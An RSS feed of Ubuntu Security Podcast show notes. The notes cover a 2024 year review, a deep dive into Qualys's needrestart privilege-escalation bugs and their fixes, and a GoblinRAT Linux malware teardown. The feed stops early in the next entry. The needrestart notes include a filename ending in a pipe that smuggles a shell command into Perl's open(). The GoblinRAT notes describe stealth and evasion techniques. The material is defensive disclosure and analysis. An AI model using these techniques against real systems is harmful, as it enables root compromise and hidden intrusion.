<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
     xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
     xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
     xmlns:media="http://search.yahoo.com/mrss/"
     xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"
    >
  <channel>
    <title>Ubuntu Security Podcast</title>
    <atom:link href="https://ubuntusecuritypodcast.org/episode/index.xml" rel="self" type="application/rss+xml" />
    <link>https://ubuntusecuritypodcast.org/</link>
    <description>A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.</description>
    <lastBuildDate>Fri, 20 Dec 2024 14:58:00 &#43;1030</lastBuildDate>
    <sy:updatePeriod>hourly</sy:updatePeriod>
    <sy:updateFrequency>1</sy:updateFrequency>
    <language>en-us</language>
    <copyright>Copyright 2018-2024 Canonical</copyright>
    
    <itunes:author>Ubuntu Security Team</itunes:author>
    <itunes:type>episodic</itunes:type>
    <googleplay:author>Ubuntu Security Team</googleplay:author>
    <googleplay:email>alex.murray@canonical.com</googleplay:email>
    <itunes:summary>A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.</itunes:summary>
    <googleplay:description>A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.</googleplay:description>
    <itunes:owner>
      <itunes:name>Alex Murray</itunes:name>
      <itunes:email>alex.murray@canonical.com</itunes:email>
    </itunes:owner>
    <itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_1400.png" />
    <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_1400.png"></googleplay:image>
    <image>
      <url>https://ubuntusecuritypodcast.org/img/usp_logo_1400.png</url>
      <title>Ubuntu Security Podcast</title>
      <link>https://ubuntusecuritypodcast.org/</link>
    </image>
    <itunes:category text="Technology">
      </itunes:category><itunes:explicit>no</itunes:explicit>
    <googleplay:explicit>no</googleplay:explicit><generator>Hugo -- gohugo.io</generator>
        <item>
          
            <title>Episode 243
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-243/</link>
          <pubDate>Fri, 20 Dec 2024 14:58:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>128f9874a1080e28b00d82e910bf452bd003f413dc159c7d9bb78693cdf136de158ad0d37baad544371781fa884315a6a52d296439f67c94e1f50dab967de3d2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 243</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's the end of the year for official duties for the Ubuntu Security team so
  we take a look back on the security highlights of 2024 for Ubuntu and predict
  what is coming in 2025.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's the end of the year for official duties for the Ubuntu Security team so
  we take a look back on the security highlights of 2024 for Ubuntu and predict
  what is coming in 2025.
  </itunes:summary>
        <description>  It's the end of the year for official duties for the Ubuntu Security team so
  we take a look back on the security highlights of 2024 for Ubuntu and predict
  what is coming in 2025.
  </description>
        <googleplay:description>  It's the end of the year for official duties for the Ubuntu Security team so
  we take a look back on the security highlights of 2024 for Ubuntu and predict
  what is coming in 2025.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s the end of the year for official duties for the Ubuntu Security team so we
take a look back on the security highlights of 2024 for Ubuntu and predict what is coming in 2025.</p>
<h3 id="2024-year-in-review-for-ubuntu-security--00-55">2024 Year in Review for Ubuntu Security (00:55)</h3>
<h4 id="full-disclosure-necromancy-with-zombie-cves">full-disclosure necromancy with zombie CVEs</h4>
<ul>
<li><a href="/episode-217/#full-disclosure-spammed-with-zombie-cves--09-52">full-disclosure spammed with zombie CVEs from Episode 217</a></li>
</ul>
<h4 id="development-of-unprivileged-user-namespace-restrictions-for-ubuntu-24-dot-04-lts">Development of unprivileged user namespace restrictions for Ubuntu 24.04 LTS</h4>
<ul>
<li><a href="/episode-218/#updates-for-unprivileged-user-namespace-restrictions-in-ubuntu-24-dot-04-lts--10-32">Updates for unprivileged user namespace restrictions in Ubuntu 24.04 LTS from Episode 218</a></li>
</ul>
<h4 id="linux-kernel-becomes-a-cna">Linux kernel becomes a CNA</h4>
<ul>
<li><a href="/episode-219/#linux-kernel-becomes-a-cna--11-25">Linux kernel becomes a CNA from Episode 219</a></li>
<li><a href="/episode-220/#follow-up-to-linux-kernel-cna--11-40">Follow up to Linux kernel CNA from Episode 220</a></li>
</ul>
<h4 id="ubuntu-participates-in-pwn2own-vancouver">Ubuntu participates in Pwn2Own Vancouver</h4>
<ul>
<li><a href="/episode-223/#summary-of-pwn2own-vancouver-2024-results-against-ubuntu-23-dot-10--08-05">Summary of Pwn2Own Vancouver 2024 results against Ubuntu 23.10 from Episode 223</a></li>
</ul>
<h4 id="xz-utils-ssh-backdoor-supply-chain-attack">xz-utils / SSH backdoor supply-chain attack</h4>
<ul>
<li><a href="/episode-224/#xz-utils-backdoor-and-ubuntu">xz-utils backdoor and Ubuntu from Episode 224</a></li>
<li><a href="/episode-225/#update-on-xz-utils--15-18">Update on xz-utils from Episode 225</a></li>
</ul>
<h4 id="linux-security-summit-na-and-eu">Linux Security Summit NA and EU</h4>
<ul>
<li><a href="/episode-226/#linux-security-summit-na-2024--07-22">Linux Security Summit NA 2024 from Episode 226</a></li>
<li><a href="/episode-237/#linux-security-summit-europe-2024--03-44">Linux Security Summit Europe 2024 from Episode 237</a></li>
</ul>
<h4 id="release-of-ubuntu-24-dot-04-lts">Release of Ubuntu 24.04 LTS</h4>
<ul>
<li><a href="/episode-227/#ubuntu-24-dot-04-lts--noble-numbat--released--14-27">Ubuntu 24.04 LTS (Noble Numbat) released from Episode 227</a></li>
</ul>
<h4 id="regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh">regreSSHion remote unauthenticated code execution vulnerability in OpenSSH</h4>
<ul>
<li><a href="/episode-232/#deep-dive-into-regresshion-remote-unauthenticated-code-execution-vulnerablity-in-openssh">Deep-dive into regreSSHion - Remote Unauthenticated Code Execution Vulnerablity in OpenSSH from Episode 232</a></li>
</ul>
<h4 id="various-other-high-profile-vulnerabilities">Various other high profile vulnerabilities</h4>
<ul>
<li><a href="/episode-234/#discussion-of-cve-2024-5290-in-wpa-supplicant--16-10">Discussion of CVE-2024-5290 in <code>wpa_supplicant</code> from Episode 234</a></li>
<li><a href="/episode-242/#deep-dive-into-needrestart-local-privilege-escalation-vulnerabilities">Deep dive into needrestart local privilege escalation vulnerabilities from Episode 242</a></li>
</ul>
<h4 id="ubuntu-windows-dual-boot-regression">Ubuntu/Windows Dual-boot regression</h4>
<ul>
<li><a href="/episode-235/#reports-of-dual-boot-linux-windows-machines-failing-to-boot--04-30">Reports of dual-boot Linux/Windows machines failing to boot from Episode 235</a></li>
</ul>
<h4 id="apparmor-based-snap-file-prompting-experimental-feature">AppArmor-based snap file prompting experimental feature</h4>
<ul>
<li><a href="/episode-236/#ubuntu-security-center-with-snapd-based-apparmor-home-file-access-prompting-preview--05-45">Ubuntu Security Center with snapd-based AppArmor home file access prompting preview from Episode 236</a></li>
<li><a href="/episode-237/#official-announcement-of-permissions-prompting-in-ubuntu-24-dot-10--09-00">Official announcement of Permissions Prompting in Ubuntu 24.10 from Episode 237</a></li>
</ul>
<h2 id="predictions-for-2025--14-35">Predictions for 2025 (14:35)</h2>
<ul>
<li>Increased use of AI to both spam projects with hallucinated CVEs (e.g. <a href="https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/">curl</a>)
but also to &ldquo;aid&rdquo; in dealing with that spam
<ul>
<li>as the shine wears of AI likely expect OSS projects to ban contributions
generated with the aid of AI - whether CVE reports or code</li>
<li>but also expect companies to try and prove the worth of AI by finding novel
vulns -
e.g. apparent first 0-day discovered with AI doing vuln research
<a href="https://googleprojectzero.blogspot.com/2024/06/project-naptime.html">https://googleprojectzero.blogspot.com/2024/06/project-naptime.html</a></li>
<li>also more expected uses of AI like automating tasks used in the process of
security-related SW dev - automatically generating fuzz targets and then
improving the fuzz targets via AI as well
<a href="https://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html">https://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html</a></li>
</ul>
</li>
<li>More malware targeting Linux
<ul>
<li>didn&rsquo;t mention it earlier but we covered a number of Linux malware teardowns
this year and expect that trend to increase as Linux keeps growing in
popularity</li>
</ul>
</li>
<li>Full LSM stacking still won&rsquo;t make it into the upstream Linux kernel</li>
<li>Integrity of code and data will play more of a role
<ul>
<li>both in terms of software supply chain and integrity of distro repos etc,
but also efforts to try and guarantee the integrity of a Linux system
itself - whether via new <a href="https://docs.kernel.org/next/admin-guide/LSM/ipe.html">IPE LSM</a> or other mechanisms - mainstream distros
will start to care about integrity more</li>
</ul>
</li>
<li>More collaboration across distros to aid in efforts to collectively handle
deluge of CVEs</li>
<li>More efforts to try and fund OSS to learn from lessons of Heartbleed and xz-utils
<ul>
<li>some more and less successful</li>
</ul>
</li>
<li>More interesting vulns in more software
<ul>
<li>During 2024 Qualys have done some of the most interesting vuln research on
Linux - expect more from them and from others (whether aided by AI or not)</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E243.mp3" length="24313760" type="audio/mpeg" /><itunes:duration>1440</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 242
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-242/</link>
          <pubDate>Fri, 29 Nov 2024 11:54:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>c320f1b8ebcdc0d84700c3fadb2d2629b56f69c446cba14f98361e9985ac8ceabaea8823354171517df27670ea08afca7159179c097c341ee05663c42cacaeba</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 242</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we dive into the details of a number of local privilege escalation
  vulnerablities discovered by Qualys in the needrestart package, covering topics
  from confused deputies to the inner workings of the /proc filesystem and...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we dive into the details of a number of local privilege escalation
  vulnerablities discovered by Qualys in the needrestart package, covering topics
  from confused deputies to the inner workings of the /proc filesystem and
  responsible disclosure as well.
  </itunes:summary>
        <description>  This week we dive into the details of a number of local privilege escalation
  vulnerablities discovered by Qualys in the needrestart package, covering topics
  from confused deputies to the inner workings of the /proc filesystem and
  responsible disclosure as well.
  </description>
        <googleplay:description>  This week we dive into the details of a number of local privilege escalation
  vulnerablities discovered by Qualys in the needrestart package, covering topics
  from confused deputies to the inner workings of the /proc filesystem and
  responsible disclosure as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we dive into the details of a number of local privilege escalation
vulnerablities discovered by Qualys in the needrestart package, covering topics
from confused deputies to the inner workings of the /proc filesystem and
responsible disclosure as well.</p>
<h2 id="deep-dive-into-needrestart-local-privilege-escalation-vulnerabilities">Deep dive into needrestart local privilege escalation vulnerabilities</h2>
<ul>
<li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart">https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart</a></li>
<li><a href="https://www.qualys.com/2024/11/19/needrestart/needrestart.txt">https://www.qualys.com/2024/11/19/needrestart/needrestart.txt</a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/">https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/</a></li>
<li>Qualys contacted <a href="mailto:security@ubuntu.com">security@ubuntu.com</a> on <!-- raw HTML omitted --><!-- raw HTML omitted -->[2024-10-04 Fri] <!-- raw HTML omitted --><!-- raw HTML omitted --> to notify of 3
different local privilege escalation vulnerablities in needrestart</li>
<li>needrestart is system service, written in Perl, to automatically restart
system services if one of the libraries or the service itself was updated</li>
<li>installed by default on Ubuntu Server since 21.04 - so anyone using 22.04 LTS
(jammy) or 24.04 LTS (noble) would be affected - and is integrated into apt so
that it runs at the end of an apt install/upgrade/remove or via
unattended-upgrades (which again is installed by default to install security
updates automatically every 24 hours)</li>
<li>since it runs via apt it runs as root so if an unprivileged user can influence
it to execute code of their chosing, can achieve local privilege escalation
the next time it runs</li>
<li>Initially described these as:
<ul>
<li>trick needrestart into running the Python interpreter with an attacker controlled PYTHONPATH environment variable</li>
<li>win a race condition with needrestart to trick it into running with attacker
controlled Python interpreter instead of the system-installed one</li>
<li>perl-related vuln in the ScanDeps module where would open a filename
containing a pipe - which in turn causes Perl to execute a shell pipeline
with the filename as input and hence code execution</li>
</ul>
</li>
<li>needrestart is written in Perl so why is Python relevant?
<ul>
<li>basic functionality of needrestart is to look at the shared objects mapped
into memory of each process and match these against newly updated/installed
packages - if it sees that one of the shared objects for a given process got
updated it will then be restarted</li>
<li>back in 2014 introduced support for scanning files of interpreted languages for Java, Perl, Python and Ruby
<ul>
<li>uses <code>/proc/self/exe</code> to first identify the interpreter as say python</li>
<li>then looks at <code>/proc/self/cmdline</code> to determine the primary file being run
by the interpreter and from that looks at <code>import</code> statements to determine
which files are likely being used</li>
<li>uses similar approaches for the other interpreters</li>
</ul>
</li>
</ul>
</li>
<li>Interestingly it seems Qualys discovered this by accident - noticed the
message &ldquo;Scanning processes&hellip;&rdquo; whilst doing and apt upgrade and wondered what
that was - and if they controlled a process, whether they could then influence
the behaviour of it</li>
<li>For PYTHONPATH CVE, needrestart needs to replicate the behaviour of the Python
interpreter when it imports files
<ul>
<li>PYTHONPATH env var allows to specify a
custom path to import from - so needrestart looks this up from
<code>/proc/pid/environ</code> and executes the Python interpreter with this same value
to get it to resolve the imports to files on disk</li>
<li>But the unprivileged user is in control of this environment variable for their
process - classic case of a <a href="https://dl.acm.org/doi/10.1145/54289.871709">Confused Deputy</a> - lower privileged application is
able to trick a higher privileged application into misusing its authority on
the system - so can set their own PYTHONPATH, and since Python will happy load
any <code>__init__.so</code> files from that path, the attacker controlled shared object
is then executed by Python running as root via needrestart</li>
</ul>
</li>
<li>Initially Qualys suggested the Ruby implementation (which uses the <code>RUBYLIB</code>
env var) may also be affected and subsequently confirmed this to be the case</li>
<li>The second aforementioned vuln is also related to Python but instead of the
<code>PYTHONPATH</code> used by the interpreter, is about the interpreter binary itself
<ul>
<li>Before we said needrestart identified a process as using say Python by
looking at its <code>/proc/pid/exe</code> entry - matches this against a regex like
/usr/bin/python - back in 2022 Jakub Wilk discovered a vuln where the regex
was not anchored, so if a process was running via a attacker controlled
interpreter (<code>/home/amurray/usr/bin/python</code>) this would match and
needrestart would execute that interpreter directly as root - CVE-2022-30688</li>
<li>Hoewever, it turns out needrestart reads the processes <code>/proc/pid/exe</code>
twice - once early on when collecting info on all processes, and then a
second time to determine if it is say a Python application - but when
needrestart goes and executes this interpreter to do the PYTHONPATH lookups
etc, it uses the original value that it collected at the start of its run</li>
<li>Classic TOCTOU issue</li>
<li>So a malicious process can run with say its own malicious Python interpreter
at startup, then wait for needrestart to probe that (using say inotify to be
notified when it is accessed) and then quickly exec() the real system Python
interpreter and hence change its <code>/proc/self/exe</code> to trick needrestart -
which will then go and execute its original malicious interpreter binary</li>
</ul>
</li>
<li>Since had found issues in Python and Ruby parts of needrestart, Qualys went
looking at the Perl parts
<ul>
<li>since needrestart is written in Perl though it doesn&rsquo;t have to execute a
Perl interpreter to resolve &ldquo;imports&rdquo; etc</li>
<li>instead uses a Perl library (ScanDeps) which analyses Perl scripts directly</li>
<li>Found this module was vulnerable to a very old Perl foot-gun, Pesky Pipe
(coined in <a href="https://phrack.org/issues/55/7.html#article">1999 by rain.forest.puppy in Phrack</a>)
<ul>
<li>Perl has a feature where you can call <code>open</code> with a string that ends in a
pipe (<code>|</code>) and it will instead execute that string as a shell command</li>
<li>ScanDeps did exactly this - called <code>open</code> on any files that it finds along
the way in its analysis - and since these filenames are controlled by the
unprivileged attacker, can create a file which ends in a pipe character
(e.g. <code>/home/amurray/bin/pwned|</code>) and Perl will then just execute that
script directly</li>
</ul>
</li>
<li>Also found cases in ScanDeps where it would call <code>eval()</code> on contents from
these files as well - directly executing whatever strings found as Perl code</li>
</ul>
</li>
<li>Mark Esler on our team then liased with Qualys and got the upstream
needrestart developer involved to coordinate on writing fixes and disclosing
the issue - first to other distros via the distros mailing list and then
eventually publicly via oss-security</li>
<li>Patches to fix went through a number of revisions before being finalised</li>
<li>To fix these, a number of changes were made:
<ul>
<li>ScanDeps was fixed to use an explicit call to open() to avoid Perl executing
the argument as code and the uses of eval replaced with safer parsing</li>
<li>needrestart removed the use of ScanDeps entirely and instead replaced this
with its own regex based parsing of perl files to look for <code>use</code> directives</li>
<li>needrestart modified to not set PYTHONPATH when running the Python
interpreter and instead look inside the specified PYTHONPATH manually (to
avoid having the Python interpreter possibly load untrusted shared objects
from that path) - similarly for RUBYLIB</li>
<li>needrestart modified to use the original <code>/proc/pid/exe</code> path to match
against when looking for interpreted processes to remove the TOCTOU race</li>
</ul>
</li>
<li>Unfortunately, testing for the patches upstream wasn&rsquo;t complete and a minor
regression was introduced in the original update which caused needrestart to
misidentify processes within a container as being on the host and so would
inadvertently kill them</li>
<li>Sudhakar Verma (who handled the technical side of testing proposed patches
plus preparing and releasing the final updates) liased with upstream to help
get a fix developed and deployed as a regression fix for Ubuntu</li>
<li>Interesting to consider, the info needrestart was using comes from <code>/proc</code>
filesystem - this is a virtual filesystem managed by the kernel, representing
information about processes in userspace</li>
<li>Easy to assume the data it presents is trusted as it is populated by the
kernel - and generally file permissions are read-only for these files - so a
process can&rsquo;t just directly write to them to modify them - BUT these values
all come from the userspace process itself originally
<ul>
<li>perhaps needrestart could look at dropping privileges to those of the
process in question before doing the evaluation as well - although this is
tricky to do correctly - we&rsquo;ve seen bugs in a number of applications which
try and follow this pattern like snap-confine or apport which turn out to
cause security issues as they don&rsquo;t drop privileges completely etc</li>
</ul>
</li>
<li>Ryan Lee is looking to create an AppArmor profile for needrestart to help
confine it to hopefully limit the damage any other similar bugs may cause</li>
</ul>
<h3 id="usn-7117-1-needrestart-and-module-scandeps-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7117-1">USN-7117-1</a>] needrestart and Module::ScanDeps vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS), 24.10
<ul>
<li>2 medium priority CVE(s)</li>
<li>3 high priority CVE(s)</li>
</ul>
</li>
</ul>
<h3 id="usn-7117-2-needrestart-regression">[<a href="https://ubuntu.com/security/notices/USN-7117-2">USN-7117-2</a>] needrestart regression</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS), 24.10
<ul>
<li>2 medium priority CVE(s)</li>
<li>3 high priority CVE(s)</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E242.mp3" length="19956813" type="audio/mpeg" /><itunes:duration>1180</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 241
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-241/</link>
          <pubDate>Thu, 14 Nov 2024 22:59:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>5d23108a1e6c6d5cd045b9215686dbbaeccb86f6ab3409bfdabb747cfb1a105563d893ce6bf330b43d6ab633ab3e5dd9865aa400157ccf6fc69554a5e868ac37</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 241</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a deep dive into the latest Linux malware, GoblinRAT to look
  at how malware is evolving to stay stealthy and evade detection and how malware
  authors are learning from modern software development along the way.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a deep dive into the latest Linux malware, GoblinRAT to look
  at how malware is evolving to stay stealthy and evade detection and how malware
  authors are learning from modern software development along the way.
  </itunes:summary>
        <description>  This week we take a deep dive into the latest Linux malware, GoblinRAT to look
  at how malware is evolving to stay stealthy and evade detection and how malware
  authors are learning from modern software development along the way.
  </description>
        <googleplay:description>  This week we take a deep dive into the latest Linux malware, GoblinRAT to look
  at how malware is evolving to stay stealthy and evade detection and how malware
  authors are learning from modern software development along the way.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a deep dive into the latest Linux malware, GoblinRAT to look
at how malware is evolving to stay stealthy and evade detection and how malware
authors are learning from modern software development along the way.</p>
<h2 id="goblinrat-linux-malware-teardown">GoblinRAT Linux Malware teardown</h2>
<ul>
<li>
<p><a href="https://rt-solar.ru/solar-4rays/blog/4861/">https://rt-solar.ru/solar-4rays/blog/4861/</a></p>
</li>
<li>
<p>Solar 4RAYS team (Cyber Threat Research Center at SOLAR - Russian
Cybersecurity firm) describes a new piece of Linux malware which they name
GoblinRAT (RAT = Remote Access Trojan) 2023 when contacted by an IT company which provides
services to (presumably) Russian government agencies - noticed system logs
being deleted off one of their servers and a utility being downloaded to steal
account passwords from a domain controller</p>
</li>
<li>
<p>Found this malware masquerading as a legitimate process which takes quite
careful steps to avoid detection - in fact most of the functionality within
the malware is devoted to hiding its presence on the target system</p>
</li>
<li>
<p>Doesn&rsquo;t include automatic persistence but instead appears to be manually
&ldquo;installed&rdquo; by the attackers with a unique name for each target where it would
be named after an existing legitimate process on the target system - similarly
even the names of its files and libraries were also unique per-system as well
to avoid detection</p>
<ul>
<li>e.g. in one case where zabbix was running, the malware named itself
<code>zabbix_agent</code> and setup a new systemd service to launch itself at boot
which looks identical to the real zabbix agent (except the real one is
<code>zabbix_agentd</code>) and then once running it edits its own command-line
arguments after startup to insert standard parameters expected by the real
<code>zabbix_agentd</code> so that on a <code>ps aux</code> or similar output it appears basically
identical to the real <code>zabbix_agentd</code></li>
<li>in another case it named itself <code>rhsmd</code> to mimic the Red Hat subscription
manager service again using systemd as the launcher, whilst for others as
<code>memcached</code> using cron to launch</li>
<li>C2 uses DDNS (Dynamic DNS) and legitimate hacked sites to hide in noise of
&ldquo;normal&rdquo; traffic - using DDNS attackers would use specifically named C2
machines per target host - in one case where it was named <code>chrony_debug</code> to
mimic the <code>chronyd</code> time synchronisation service, it would connect to C2 a
machine named <code>chronyd.tftpd.net</code> - attackers clearly went to a lot of work
to hide this in plain sight</li>
</ul>
</li>
<li>
<p>Automatically deletes itself off the system if does not get pinged by the C2
operator after a certain period of time - and when it deletes itself it <a href="https://en.wikipedia.org/wiki/Shred_(Unix)">shreds</a>
itself to reduce the chance of being detected later via disk forensics etc</p>
</li>
<li>
<p>Has 2 versions - a &ldquo;server&rdquo; and &ldquo;client&rdquo; - the server uses <a href="https://en.wikipedia.org/wiki/Port_knocking">port-knocking</a> to
watching incoming connection requests on a given network interface and then
only actually allowing a connection if the expected sequence of port numbers
was tried - this allows the controller of the malware to connect into it
without the malware actively listening on a given port and hence reduces the
chance it is detected accidentally</p>
</li>
<li>
<p>Client instead connects back to its specific C2 server</p>
</li>
<li>
<p>Logs collected by 4RAYS team appear to show the commands executed by the
malware were quite manual looking - invoking bash and then later invoking
commands like systemctl to stop and replace an existing service, where the
time lag between commands is in the order of seconds - minutes and so would
seem like these were manually typed command rather than automatically driven
by scripts</p>
</li>
<li>
<p>Malware itself is implemented in Go and includes the ability to execute single
commands as well as providing an interactive shell; also includes support for
listing / copying / moving files including with compression; also works as a
SOCKS5 proxy to allow it to proxy traffic to/from other hosts that may be
behind more restrictive firewalls etc; and as detailed above the ability to
mimic existing processes on the system to avoid detection</p>
</li>
<li>
<p>To try and frustrate reverse engineering <a href="https://github.com/unixpickle/gobfuscate">Gobfuscate</a> was used to obfuscate the
compiled code - odd choice though since this project was seemingly abandonded
3 years ago and nowadays <a href="https://github.com/burrowers/garble">garble</a> seems to be the go-to tool for this (no pun
intended)- but perhaps this is evidence of the time of the campaign since
these samples were all found back in 2020 which this project was more active&hellip;</p>
</li>
<li>
<p>Encrypts its configuration using AES-GCM and the config contains details like
the shell to invoke, kill-switch delay and secret value to use to disable it,
alternate process name to use plus the TLS certificate and keys to use when
communicating with the C2 server</p>
</li>
<li>
<p>Uses the <a href="https://github.com/hashicorp/yamux">yamux</a> Go connection multiplexing library then to multiplex the single
TLS connection to/from the C2 server</p>
</li>
<li>
<p>Can then be instructed to perform the various actions like running commands /
launching a shell / list files in a directory / reading files etc as discussed
before</p>
</li>
<li>
<p>Other interesting part is the kill switch / self-destruct functionality - if
kill switch delay is specified in the encrypted configuration malware will
automatically delete itself by invoking dd to overwrite itself with input from
/dev/urandom 8 times; once more with 0 bytes and finally then removing the
file from disk</p>
</li>
<li>
<p>Overall 4 organisations were found to have been hacked with this and in each
it was running with full admin rights - with some running for over 3 years -
and various binaries show compilation dates and golang toolchain versions
indicating this was developed since at least 2020</p>
</li>
<li>
<p>But unlike other malware that we have covered, it does not appear to be a more
widespread campaign since &ldquo;other information security companies with global
sensor networks&rdquo; couldn&rsquo;t find any similar samples in their own collections</p>
</li>
<li>
<p>No clear evidence of origin - Solar 4RAYS asking for other cybersecurity
companies to help contribute to their evidence to identify the attackers</p>
</li>
<li>
<p>Interesting to see the evolution of malware mirrors that of normal software
development - no longer using C/C++ etc but more modern languages like Go
which provide exactly the sorts of functionality you want in your malware -
systems-level programming functionality with built-in concurrency and memory
safety - also Go binaries are statically linked so no need to worry about
dependencies on the target system</p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E241.mp3" length="19033937" type="audio/mpeg" /><itunes:duration>1096</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 240
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-240/</link>
          <pubDate>Thu, 31 Oct 2024 16:17:00 +0100 </pubDate>
          <dc:creator></dc:creator>
          <guid>5b600c2384df49b5845d0a623f89bdc32b26335f119bbe1820e4eb3305ca9e5b01f8dee8198a147704c82cbc2f6d4d879ed91141a1d8653b099ce4a2c3f99d76</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 240</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For the third and final part in our series for Cybersecurity Awareness Month,
  Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in
  cybersecurity and the likely threats of the future.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  For the third and final part in our series for Cybersecurity Awareness Month,
  Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in
  cybersecurity and the likely threats of the future.
  </itunes:summary>
